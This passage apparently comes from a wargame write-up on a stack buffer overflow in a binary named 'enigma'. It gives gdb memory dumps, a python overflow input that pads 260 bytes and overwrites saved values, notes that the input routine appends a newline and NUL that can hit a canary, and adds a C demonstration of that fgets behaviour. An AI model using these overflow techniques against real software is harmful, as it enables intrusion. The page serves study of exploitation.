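It seems that when the data is placed at its destination, a null character is appended after it.
Therefore, if a canary sits immediately after ret, be careful, because the write can run into the canary.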
(gdb) x/100x $esp
0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1
0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161
0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a
0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000
0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161
(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res
(gdb) r < res
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/cruel/tmp/enigma < res
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x576000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you :
Breakpoint 3, 0x08048526 in vuln ()
(gdb) x/100x $esp
0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1
0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161
0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363
0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000
0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161
It seems to write the data + \x0a\x00.
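The trailing "\x0a\x00" seen in the second dump, reproduced as an added example (not code from the enigma binary). The page does not name the input routine; fgets is assumed here because it stores the newline and then a terminating NUL. BUF_LEN and guard_after_read are constructed for illustration, and the guard value is the word that follows the data in the first dump.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define BUF_LEN 8            /* constructed size; the buffer in the dump is larger */
#define GUARD   0x00031337u  /* word that follows the data in the first dump */

/* Feed a line of `len` 'a' bytes plus '\n' to fgets(frame, limit, ...) and
 * return the 32-bit word stored right after the BUF_LEN-byte buffer. */
static uint32_t guard_after_read(size_t len, int limit)
{
    /* One array models buffer + adjacent word, so the overrun stays in bounds. */
    unsigned char frame[BUF_LEN + 4] = {0};
    char line[32], *ok;
    FILE *in;
    int i;

    if (len + 1 > sizeof line || (in = tmpfile()) == NULL)
        return 0xffffffffu;
    for (i = 0; i < 4; i++)               /* store GUARD little-endian, as on x86 */
        frame[BUF_LEN + i] = (unsigned char)(GUARD >> (8 * i));

    memset(line, 'a', len);               /* constructed input line */
    line[len] = '\n';
    fwrite(line, 1, len + 1, in);
    rewind(in);

    ok = fgets((char *)frame, limit, in); /* copies data, keeps '\n', adds '\0' */
    fclose(in);
    if (ok == NULL)
        return 0xffffffffu;

    return (uint32_t)frame[BUF_LEN] | (uint32_t)frame[BUF_LEN + 1] << 8 |
           (uint32_t)frame[BUF_LEN + 2] << 16 | (uint32_t)frame[BUF_LEN + 3] << 24;
}

int main(void)
{
    /* Limit larger than the buffer: "\n\0" lands in the adjacent word. */
    printf("8 bytes, limit 12: 0x%08x\n", (unsigned)guard_after_read(8, BUF_LEN + 4));
    /* One byte shorter: only the terminating NUL crosses the boundary. */
    printf("7 bytes, limit 12: 0x%08x\n", (unsigned)guard_after_read(7, BUF_LEN + 4));
    /* Limit equal to the buffer size: the adjacent word is untouched. */
    printf("8 bytes, limit  8: 0x%08x\n", (unsigned)guard_after_read(8, BUF_LEN));
    return 0;
}
```

The first case yields 0x0003000a, the same word that appears at 0xbf9d92a0 in the second dump; passing the real buffer size as the limit leaves the adjacent word at 0x00031337.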